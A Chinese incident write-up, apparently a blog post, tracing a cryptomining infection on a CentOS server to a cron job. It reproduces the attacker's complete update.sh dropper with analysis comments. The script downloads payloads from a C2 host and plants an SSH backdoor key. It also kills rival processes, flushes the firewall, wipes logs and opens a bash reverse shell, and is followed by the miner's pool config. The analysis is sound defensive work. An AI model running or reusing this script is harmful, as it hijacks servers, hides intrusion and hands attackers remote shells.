服务器被植入挖矿木马程序纪实

我手上有一台CentOS6.9服务器,某天发现运行程序很慢,于是查看负载情况,CPU占满:
占满CPU的是两个进程:devtool 和 systemctI。注意第二个进程名结尾是大写字母 I,而不是 systemctl 的小写 l,这是为了伪装成系统命令,在 top 里很容易看漏。根据PID找到启动程序的文件:

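# Resolve the binary each PID was exec'd from.  readlink prints only the link
# target (with a "(deleted)" suffix if the file is already gone), which is the
# one thing we need here; "ll ... | grep exe" depended on a shell alias and on
# a loose substring match over a long listing.
readlink /proc/23527/exe
readlink /proc/23570/exe
# Capture argv as well before killing anything: /proc/<pid> disappears with
# the process, and the command line is what the dropper later matches on.
tr '\0' ' ' < /proc/23527/cmdline; echo
tr '\0' ' ' < /proc/23570/cmdline; echo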

启动程序的文件是:/tmp/devtool 和 /tmp/systemctI。两个都在 /tmp 下——正常的系统程序不会从 /tmp 启动,这本身就是很强的入侵信号。

然后,我将这两个文件重命名,kill掉23527和23570这两个进程。过了几分钟,发现devtool和systemctI进程又出现,把CPU占满,并且/tmp目录下也重新生成了devtool和systemctI文件。生成文件的时间为13:40,刚好是整数分钟,觉得这里有点奇怪,我又重复了一次kill进程和重命名devtool、systemctI文件的操作,到了13:50,进程又自动起来了。(事后看,kill/改名之前应该先把样本复制一份并记录 sha256:后面会看到,脚本是按文件大小校验并重新下载的,原始样本很容易丢失。)

于是,我将情况发到群里求助:

先查看/var/log/cron:

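# grep reads the file directly; piping "more" into it only adds a pager.
# cron logs the owner of every job in parentheses, e.g. "(hadoop) CMD (...)",
# so this lists each job that ran as the hadoop user and when it ran.
grep hadoop /var/log/cron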

13:40和13:50,都有执行/tmp/update.sh。而且这些记录是 grep hadoop 找到的,说明这个定时任务属于 hadoop 用户而不是 root——木马是以 hadoop 的身份在跑。再查看 hadoop 用户的 crontab(crontab -l -u hadoop):

# Runs "sh /tmp/update.sh" as this crontab's owner (hadoop) every 10 minutes;
# stdout and stderr are discarded, so cron never mails an error about it.
*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1

是这里在作怪,每10分钟以 hadoop 用户身份调用一次/tmp/update.sh,并把所有输出丢弃(所以 cron 不会发任何报错邮件)。查看里面的文件内容(下面是从机器上取下的原样脚本,只能读,千万不要执行):

#!/bin/sh
# ===========================================================================
# NOTE(review): this is the attacker's dropper / persistence script
# (update.sh), reproduced verbatim as incident evidence.  DO NOT RUN IT.
# Every "#" line is an analysis note added afterwards; every command is as
# found on the host.  On this host it ran from the hadoop user's crontab
# (see the /var/log/cron excerpt above), i.e. as a NON-root user, which is
# what selects the /tmp install path further down.
# ===========================================================================

# --- Stage 1: weaken the host and hide the download tools -------------------
# Turn SELinux off for the running kernel and permanently on disk.  "2>dev/null"
# has no leading slash: unless the cwd happens to contain a "dev/" directory
# the redirection fails and sh does not execute the setenforce command at all.
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
# Drop the page cache (root only); presumably to free memory for the miner.
sync && echo 3 >/proc/sys/vm/drop_caches
# Snapshot the current user's crontab; $cont is checked later to avoid adding
# the cron entry twice.  /var/spool/cron is normally mode 700 root, so for a
# non-root user this cat fails, $cont stays empty and the entry is re-added on
# every run.
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
# Read but never used anywhere below (dead variable).
ssht=`cat /root/.ssh/authorized_keys`
# Marker file in /etc: the write succeeds only with root privileges, so the
# later [ -f "$rtdir" ] test is effectively an "am I root?" check that picks
# between the /etc and the /tmp install paths.
echo 1 > /etc/devtools
rtdir="/etc/devtools"
# Expected download helpers, and the names they are renamed to just below.
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
# Hide wget/curl under new names (root only).  Competing malware and admins
# lose them; this script still finds them through $bbdira / $ccdira.
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url

# --- Stage 2: kill competing miners -----------------------------------------
# Rival miners are matched by pool hostname / port in the process command line.
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
# "[email protected]" is almost certainly the blog's e-mail obfuscation
# overwriting whatever pattern the original sample used; the real value is
# not recoverable from this page.
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
# Kills processes under /var/lib/jenkins that carry a "-c" argument, and
# processes started as "./<digits> -c"; both look aimed at rivals dropped
# through Jenkins, though the exact target is not visible here.
ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
# Rival miner process names.  "pkill -f" matches the full command line as a
# substring, so several entries also hit legitimate daemons (irqbalance,
# polkitd, acpid) and anything whose cmdline merely contains e.g. "conns".
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f polkitd
pkill -f nanoWatch
pkill -f zigw

# Remove the current user's ENTIRE crontab, legitimate jobs included; the
# script's own entry is re-added in the install branch below.
crontab -r

# --- Stage 3: kill anything that could be a rival, spare only itself --------
# For every PID: if its executable lives under /tmp and its command line does
# not mention this malware's own files, SIGKILL it.  grep exits 1 on "no
# match", so "-ne 1" enters the kill branch on a match (or on a grep error);
# the "PID" header line from ps simply fails the /proc lookup.
ps axf -o "pid"|while read procid
do
        ls -l /proc/$procid/exe | grep /tmp
        if [ $? -ne 1 ]
        then
                # Spare its own processes: devtool, systemctI, update.sh.
                cat /proc/$procid/cmdline| grep -a -E "devtool|update.sh|systemctI"
                if [ $? -ne 0 ]
                then
                        kill -9 $procid
                else
                        echo "don't kill"
                fi
        fi
done
# Any process using >= 40% CPU that is not the miner is killed as well.  This
# is how the infection defends its CPU share -- and, every ten minutes, it also
# kills the victim's own legitimate CPU-heavy jobs.
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
        cat /proc/$procid/cmdline| grep -a -E "devtool|update.sh|systemctI"
        if [ $? -ne 0 ]
        then
                kill -9 $procid
        else
                echo "don't kill"
        fi
done



# --- Stage 4: install.  Root -> /etc (plus an SSH backdoor); else -> /tmp ---
# /etc/devtools could only be created above by a root run, so this test is
# the privilege check.  All payloads come over plain HTTP from the C2
# 207.148.70.143:8506 with no checksum; file SIZE is the only integrity test.
if [ -f "$rtdir" ]
    then
        echo "i am root"
        echo "goto 1" >> /etc/devtools
        # Clear the immutable bit set by a previous run so the files can be
        # replaced below.
        chattr -i /etc/devtool*
        chattr -i /etc/config.json*
        chattr -i /etc/update.sh*
        chattr -i /root/.ssh/authorized_keys*
        chattr -i /etc/systemctI
        # Persistence: every 10 minutes via cron.  $cont was read BEFORE the
        # "crontab -r" above, so the check is against the old crontab; if the
        # crontab binary is missing the spool file is written directly.
        if [ -f "/usr/bin/crontab" ]
                then
                        [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/10 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
                else
                         echo "*/10 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
        fi
        # SSH backdoor: append the operator's public key to root's
        # authorized_keys -- persistence that survives removing the miner.
        # "chmod 600 root/.ssh/..." is a relative path (no leading "/") and
        # is a no-op typo.  The key below is line-wrapped by the blog; in the
        # sample it is one line.  "[email protected]" is again the blog's
        # e-mail obfuscation, not the sample's key comment.
        chmod 700 /root/.ssh/
        echo >> /root/.ssh/authorized_keys
        chmod 600 root/.ssh/authorized_keys
        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPK+J+AIJvoCX67fFzfbNU5MT816KDmggltbgEI0hKZRdmMMe1ao/3CEgIzeqGbTff1suT/F1POUjGrf5t/ZqyIJzCIBKqNsxzM4tRNxrIGrqKnZ
ypRlXdX+uZNaxmNJZGkkmtdeseekped0WnWk5SsvbYghBn4y9lZnsO+C1EgjLNWkbRPuoo/RkWTIXDmB7M7UcfYf+sSpApACt8DRydSEkeY709WtL0aANnN057Wnp/Okv+buM4mnkuteLtZvCAySt7PVBrCKyhItZx9V
X/TMegljt/UPDaKfAeWF14Q1ORLRQkzZt9k+pY/ccNNbS53OmG0NhQ/awchmgXUpsP [email protected]" >> /root/.ssh/authorized_keys


        cfg="/etc/config.json"
        file="/etc/devtool"

        # Fetch config.json unless a copy of exactly 3629 bytes is present.
        # "[-f" is missing the space after "[", so it is not a command: the
        # test always fails and the else branch (unconditional re-download)
        # runs on every root run.
        if [-f "/etc/config.json" ]
        then
                filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
                if [ "$filesize_config" -ne "3629" ]
                then
                        rm /etc/config.json
                        if [ -f "$bbdir" ]
                        then
                            curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
                        elif [ -f "$ccdir" ]
                        then
                            wget --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                        elif [ -f "$ccdira" ]
                        then
                            get --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                        fi
                        # Restart the miner so it picks up the new config.
                        pkill -f devtool
                else
                        echo "no need download"
                fi
        else
                if [ -f "$bbdir" ]
                then
                        curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
                elif [ -f "$bbdira" ]
                then
                        url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
                elif [ -f "$ccdir" ]
                then
                        wget --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                elif [ -f "$ccdira" ]
                then
                        get --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                fi
        fi
        # Same size check (1489384 bytes) for "devtool", the miner binary that
        # reads config.json.
        if [ -f "/etc/devtool" ]
        then
            filesize1=`ls -l /etc/devtool | awk '{ print $5 }'`
            if [ "$filesize1" -ne "1489384" ]
            then
                rm /etc/devtool
                if [ -f "$bbdir" ]
                        then
                            curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
                        elif [ -f "$ccdir" ]
                        then
                            wget --timeout=10 --tries=100 -O /etc/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
                        elif [ -f "$ccdira" ]
                        then
                            get --timeout=10 --tries=100 -O /etc/devtool  http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
                fi
            else
                echo "not need download"
            fi
        else
            if [ -f "$bbdir" ]
                        then
                            curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
                        elif [ -f "$ccdir" ]
                        then
                            wget --timeout=10 --tries=100 -O /etc/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
                        elif [ -f "$ccdira" ]
                        then
                            get --timeout=10 --tries=100 -O /etc/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
            fi
        fi
        # update.sh itself is ALWAYS re-downloaded: a self-update channel, so
        # the behaviour seen today is whatever the C2 serves next time.
        if [ -f "$bbdir" ]
                        then
                            curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /etc/update.sh
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /etc/update.sh
                         elif [ -f "$ccdir" ]
                        then
                            wget --timeout=10 --tries=100 -O /etc/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
                        elif [ -f "$ccdira" ]
                        then
                            get --timeout=10 --tries=100 -O /etc/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
        fi
        # Second payload "systemctI" (2141224 bytes).  What it does is not
        # visible from this script beyond being started alongside the miner.
        if [ -f "/etc/systemctI" ]
        then
            filesize2=`ls -l /etc/systemctI | awk '{ print $5 }'`
            if [ "$filesize2" -ne "2141224" ]
            then
                rm /etc/systemctI
                pkill -f systemctI
                    if [ -f "$bbdir" ]
                        then
                            curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
                         elif [ -f "$ccdir" ]
                        then
                            wget --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
                        elif [ -f "$ccdira" ]
                        then
                            get --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
                fi
            else
                echo "not need download"
            fi
        else
            if [ -f "$bbdir" ]
                        then
                            curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
                         elif [ -f "$ccdir" ]
                        then
                            wget --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
                        elif [ -f "$ccdira" ]
                        then
                            get --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
            fi
        fi
        # Start whichever of the two is not already running.  "ps|grep" is a
        # loose substring match over the whole process table.
        chmod 777 /etc/devtool
        ps -fe|grep devtool |grep -v grep
        if [ $? -ne 0 ]
            then
                cd /etc
                echo "not root runing"
                sleep 5s
                ./devtool &
        else
                echo "root runing....."
        fi
            chmod 777 /etc/systemctI
        ps -fe|grep systemctI |grep -v grep
        if [ $? -ne 0 ]
            then
                cd /etc
                echo "not roots runing"
                sleep 5s
                ./systemctI &
             else
                echo "roots runing....."
        fi

        # Lock the files: world-writable but immutable, so rm/mv fail until
        # "chattr -i".  Making root's authorized_keys immutable also blocks
        # legitimate key rotation.
        chmod 777 /etc/devtool
        chattr +i /etc/devtool
            chmod 777 /etc/systemctI
            chattr +i /etc/systemctI
        chmod 777 /etc/config.json
        chattr +i /etc/config.json
        chmod 777 /etc/update.sh
        chattr +i /etc/update.sh
        chmod 777 /root/.ssh/authorized_keys
        chattr +i /root/.ssh/authorized_keys
    else
        # --- Non-root install path: /tmp.  This is the branch that ran on
        # this host.  No SSH key (no access to /root).  "chattr +i" needs
        # CAP_LINUX_IMMUTABLE and fails for a normal user, which is consistent
        # with the author being able to rename and delete the /tmp files.
        echo "goto 1" > /tmp/devtools
        chattr -i /tmp/devtool*
            chattr -i /tmp/systemctI
        chattr -i /tmp/config.json*
        chattr -i /tmp/update.sh*


        # Persistence, same logic as the root branch but pointing at /tmp.
        if [ -f "/usr/bin/crontab" ]
                then
                        [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -
                else
                         echo "*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> ${crondir}
        fi

        # config.json (3629 bytes); here the "[ -f" test is well-formed, so
        # the size check actually works.
        if [ -f "/tmp/config.json" ]
        then
                filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`
                if [ "$filesize1" -ne "3629" ]
                then
                        rm /tmp/config.json
                        if [ -f "$bbdir" ]
                        then
                            curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
                        elif [ -f "$ccdir" ]
                        then
                            wget --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                        elif [ -f "$ccdira" ]
                        then
                            get --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                        fi
                        pkill -f devtool
                else
                        echo "no need download"
                fi
        else
                if [ -f "$bbdir" ]
                then
                        curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
                elif [ -f "$bbdira" ]
                then
                        url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
                elif [ -f "$ccdir" ]
                then
                        wget --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                elif [ -f "$ccdira" ]
                then
                        get --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
                fi
        fi

        # The miner binary (1489384 bytes) -> /tmp/devtool.
        if [ -f "/tmp/devtool" ]
        then
            filesize1=`ls -l /tmp/devtool | awk '{ print $5 }'`
            if [ "$filesize1" -ne "1489384" ]
            then
                rm /tmp/devtool
                if [ -f "$bbdir" ]
                        then
                             curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
                        elif [ -f "$ccdir" ]
                        then
                                    wget --timeout=10 --tries=100 -O /tmp/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
                                elif [ -f "$ccdira" ]
                                then
                                    get --timeout=10 --tries=100 -O /tmp/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
                fi
            else
                echo "no need download"
            fi
        else
            if [ -f "$bbdir" ]
                        then
                             curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
                        elif [ -f "$bbdira" ]
                        then
                            url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
                        elif [ -f "$ccdir" ]
                        then
                                    wget --timeout=10 --tries=100 -O /tmp/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
                                elif [ -f "$ccdira" ]
                                then
                                    # Typo in the sample: "-O /tmp/ devtool" points -O at a
                                    # directory, so this renamed-wget fallback would fail.
                                    get --timeout=10 --tries=100 -O /tmp/ devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
            fi
        fi
        # Self-update of update.sh, unconditional as in the root branch.
        if [ -f "$bbdir" ]
            then
                    curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /tmp/update.sh
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /tmp/update.sh
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=100 -O /tmp/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=100 -O /tmp/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
        fi
        # Second payload (2141224 bytes) -> /tmp/systemctI.
        if [ -f "/tmp/systemctI" ]
        then
            filesize2=`ls -l /tmp/systemctI | awk '{ print $5 }'`
            if [ "$filesize2" -ne "2141224" ]
            then
                    rm /tmp/systemctI
                    pkill -f systemctI
                if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
                fi
            else
                echo "no need download"
            fi
        else
            if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
                fi
        fi
        # Start the payloads from /tmp as "./devtool" and "./systemctI" (so
        # their argv[0] is relative; match on the process name when killing).
        ps -fe|grep devtool |grep -v grep
        if [ $? -ne 0 ]
            then
                echo "not tmp runing"
                cd /tmp
                chmod 777 devtool
                sleep 5s
                ./devtool &
            else
                echo "tmp runing....."
        fi
        ps -fe|grep systemctI |grep -v grep
        if [ $? -ne 0 ]
            then
                echo "not tmps runing"
                cd /tmp
                chmod 777 systemctI
                sleep 5s
                ./systemctI &
            else
                echo "tmps runing....."
        fi


        # Attempt to lock the /tmp files (the +i part fails without root).
        chmod 777 /tmp/devtool
        chattr +i /tmp/devtool
        chmod 777 /tmp/systemctI
        chattr +i /tmp/systemctI
        chmod 777 /tmp/update.sh
        chattr +i /tmp/update.sh
        chmod 777 /tmp/config.json
        chattr +i /tmp/config.json

fi
# --- Stage 5: firewall, anti-forensics, reverse shell -----------------------
# Flush ALL iptables rules and delete user chains: the host firewall is gone
# (root only).
iptables -F
iptables -X
# Then block outbound TCP to ports commonly used by rival pools.  Its own
# pools (config.json: ports 13531 and 45700) are untouched.
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
# Anti-forensics: clear the in-memory shell history, root's mailbox (where
# cron would have mailed errors), the login records (wtmp), the auth log
# (secure) and root's bash history.  The file truncations need root -- from
# the hadoop crontab they fail -- but any run as root leaves "last" and
# /var/log/secure blind for everything before that moment.
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
# Reverse shell: an interactive bash with stdin/stdout/stderr wired to the C2
# at 207.148.70.143:8888, attempted every 10 minutes.  This hands the operator
# a live shell on the host -- the incident is not "just" cryptomining.
bash -i >& /dev/tcp/207.148.70.143/8888 0>&1

207.148.70.143 这个 IP 在新加坡。脚本里所有文件都从它的 8506 端口下载,而脚本最后一行又会向它的 8888 端口反弹一个交互式 bash,所以它就是攻击者的 C2:这台机器不只是被挖矿,攻击者每 10 分钟就能拿到一个 shell。另外脚本还会把 wget/curl 改名成 /usr/bin/get、/usr/bin/url,给 root 的 authorized_keys 追加公钥,并清空 wtmp/secure/bash_history——这些动作都需要 root 权限,本机以 hadoop 身份运行时应该没有成功,但值得逐一核实。上面文件里面,引用了一个配置文件/tmp/config.json,打开查看内容:

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 1,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 90,
    "pools": [
        {
            "url": "xmr.f2pool.com:13531",
            "user": "83p6VPXu8SsZsH22EG9iQxg97M6K81Jft1CGXYwrVgkSa45KQm6Dau9HN6w3oroHKfJkzL2298CVD41eejCvJTd76Grq9wd.gbgbhft656561",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 8,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "xmr.pool.minergate.com:45700",
            "user": "jbk665q8hws5vxv",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 8,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": 0,
            "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 1,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 2,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 3,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 4,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 5,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 6,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 7,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 8,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 9,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 10,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 11,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 12,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 13,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 14,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 15,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 16,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 17,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 18,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 19,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 20,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 21,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 22,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 23,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 24,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 25,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 26,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 27,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 28,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 29,
                "asm": true
        },
        {
                "low_power_mode":1,
                "affine_to_cpu": 30,
